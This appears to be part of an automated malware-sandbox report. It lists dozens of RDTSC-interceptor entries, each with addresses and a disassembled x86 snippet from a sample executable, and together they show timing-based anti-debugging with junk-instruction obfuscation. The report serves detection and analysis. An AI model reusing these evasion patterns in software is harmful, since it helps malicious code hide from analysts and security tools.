                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2FDD7 second address: E2FE20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91E851B8E9h 0x00000010 jmp 00007F91E851B8E9h 0x00000015 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2ED5F second address: E2ED6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F91E8D54022h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2ED6C second address: E2ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F14C second address: E2F155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F155 second address: E2F168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8DAh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E03296 second address: E032B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E032B3 second address: E032CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F91E851B8D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F91E851B8D6h 0x00000018 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E080F2 second address: E0811D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F91E8D54016h 0x00000009 jng 00007F91E8D54016h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F91E8D54026h 0x0000001a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0811D second address: E081AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jng 00007F91E851B8DCh 0x00000010 push dword ptr fs:[00000000h] 0x00000017 adc ebx, 1E03653Ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+12450F4Bh], esi 0x0000002a mov eax, dword ptr [ebp+122D11A5h] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F91E851B8D8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov di, cx 0x0000004d push FFFFFFFFh 0x0000004f mov edi, dword ptr [ebp+122D3967h] 0x00000055 nop 0x00000056 pushad 0x00000057 jnl 00007F91E851B8D8h 0x0000005d push ebx 0x0000005e jnp 00007F91E851B8D6h 0x00000064 pop ebx 0x00000065 popad 0x00000066 push eax 0x00000067 jc 00007F91E851B8DEh 0x0000006d push esi 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0A0FD second address: E0A113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F91E8D5401Ch 0x00000010 jnl 00007F91E8D54016h 0x00000016 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0D2E9 second address: E0D2EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E0D39D second address: E0D3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E8D5401Dh 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E133EC second address: E13492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F91E851B8D8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call 00007F91E851B8DDh 0x0000002a xor di, 3821h 0x0000002f pop ebx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F91E851B8D8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 add edi, 32EDF6AAh 0x00000057 mov dword ptr fs:[00000000h], esp 0x0000005e jnp 00007F91E851B8D8h 0x00000064 mov bl, 8Fh 0x00000066 mov eax, dword ptr [ebp+122D0469h] 0x0000006c movzx edi, di 0x0000006f push FFFFFFFFh 0x00000071 mov dword ptr [ebp+122D3402h], edx 0x00000077 push eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b jns 00007F91E851B8D6h 0x00000081 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E143D9 second address: E143E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91E8D5401Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E172C3 second address: E172C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E172C7 second address: E172CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E172CD second address: E172DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91E851B8DBh 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F84A second address: E2F85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F91E8D54016h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F85C second address: E2F863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F863 second address: E2F86E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F91E8D54016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E2F86E second address: E2F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F91E851B8E2h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F91E851B901h 0x00000012 jmp 00007F91E851B8DEh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E38926 second address: E38946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F91E8D5401Bh 0x00000010 jng 00007F91E8D5401Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E38946 second address: E3895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8DFh 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DC2ABF second address: DC2AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37805 second address: E37809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFAF36 second address: DFB00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov edi, dword ptr [ebp+122D3813h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F91E8D54018h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 and edi, 6F0A8424h 0x00000038 mov edx, dword ptr [ebp+122D3A1Fh] 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 stc 0x00000046 mov dl, F1h 0x00000048 mov dword ptr [ebp+1247FBCBh], esp 0x0000004e mov edx, 4CE4FCBFh 0x00000053 cmp dword ptr [ebp+122D3997h], 00000000h 0x0000005a jne 00007F91E8D5410Eh 0x00000060 jmp 00007F91E8D54024h 0x00000065 mov byte ptr [ebp+122D33B9h], 00000047h 0x0000006c pushad 0x0000006d sub dword ptr [ebp+122D1B6Dh], ecx 0x00000073 mov dword ptr [ebp+122D1E3Eh], esi 0x00000079 popad 0x0000007a push ecx 0x0000007b jmp 00007F91E8D5401Dh 0x00000080 pop edx 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007F91E8D54028h 0x0000008b mov dword ptr [ebp+122D32A7h], edi 0x00000091 pop edi 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 jmp 00007F91E8D54025h 0x0000009a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFB00E second address: DFB018 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91E851B8DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFB3E3 second address: DFB3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFB48F second address: DFB4A1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFB9B2 second address: DFBA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D380Fh] 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F91E8D54018h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D39A3h] 0x00000031 nop 0x00000032 jmp 00007F91E8D54026h 0x00000037 push eax 0x00000038 push edi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFBD70 second address: DFBD76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFBD76 second address: DFBDC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dword ptr [ebp+122D1E88h], esi 0x00000010 push 0000001Eh 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F91E8D54018h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sbb dl, 0000005Ah 0x0000002f mov ecx, edx 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFBDC9 second address: DFBDD7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: DFBEDF second address: DFBEEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F91E8D54016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37AE8 second address: E37B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F91E851B8D6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F91E851B8E8h 0x00000013 jne 00007F91E851B8D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37B16 second address: E37B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37B1F second address: E37B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37B23 second address: E37B48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F91E8D54016h 0x00000013 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37E40 second address: E37E85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F91E851B8D6h 0x00000008 jmp 00007F91E851B8DEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jno 00007F91E851B8D6h 0x00000016 jmp 00007F91E851B8E6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d jmp 00007F91E851B8DDh 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E37E85 second address: E37EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D54020h 0x00000008 jmp 00007F91E8D54023h 0x0000000d popad 0x0000000e js 00007F91E8D5401Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E405F6 second address: E4060F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F91E851B8DCh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4060F second address: E40630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Eh 0x00000007 jc 00007F91E8D54016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E407B8 second address: E407BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E13 second address: E40E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E21 second address: E40E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E25 second address: E40E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D5401Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F91E8D54020h 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007F91E8D54016h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E57 second address: E40E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E5D second address: E40E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E40E61 second address: E40E67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4505C second address: E45062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E48037 second address: E4804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F91E851B8D6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jno 00007F91E851B8D6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4804C second address: E48072 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F91E8D5401Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F91E8D5401Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E48072 second address: E48078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E48078 second address: E4807D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E47BEA second address: E47BFE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F91E851B8D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E47BFE second address: E47C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4DF82 second address: E4DF88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4E0E2 second address: E4E0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4E39A second address: E4E3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F91E851B8DAh 0x0000000c pop edx 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E4EFB7 second address: E4EFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F91E8D54029h 0x0000000b jmp 00007F91E8D54027h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5279A second address: E527C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F91E851B8D6h 0x00000009 jmp 00007F91E851B8E2h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F91E851B8DAh 0x00000018 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E527C4 second address: E527CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5290E second address: E52929 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F91E851B8E1h 0x0000000f rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E55691 second address: E5569E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F91E8D5402Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5569E second address: E556B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E851B8E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E556B8 second address: E556C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E55853 second address: E5585B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5585B second address: E55860 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5D18E second address: E5D192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5D192 second address: E5D19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5D19B second address: E5D1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5D1A7 second address: E5D1AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5B524 second address: E5B52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5B7DC second address: E5B7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5BDF4 second address: E5BDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5BDFA second address: E5BE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F91E8D54018h 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F91E8D5401Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5BE13 second address: E5BE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F91E851B8E3h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F91E851B8DBh 0x00000011 rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5BE2A second address: E5BE43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F91E8D54024h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\userGDHIIIIEHC.exeRDTSC instruction interceptor: First address: E5CE4F second address: E5CE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
